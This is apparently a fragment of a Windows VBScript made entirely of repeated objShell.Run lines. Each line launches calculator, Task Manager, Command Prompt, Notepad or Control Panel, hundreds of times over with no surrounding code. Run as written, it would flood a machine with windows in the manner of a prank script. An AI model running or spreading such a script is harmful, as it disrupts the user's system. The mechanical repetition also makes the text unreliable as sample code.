objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

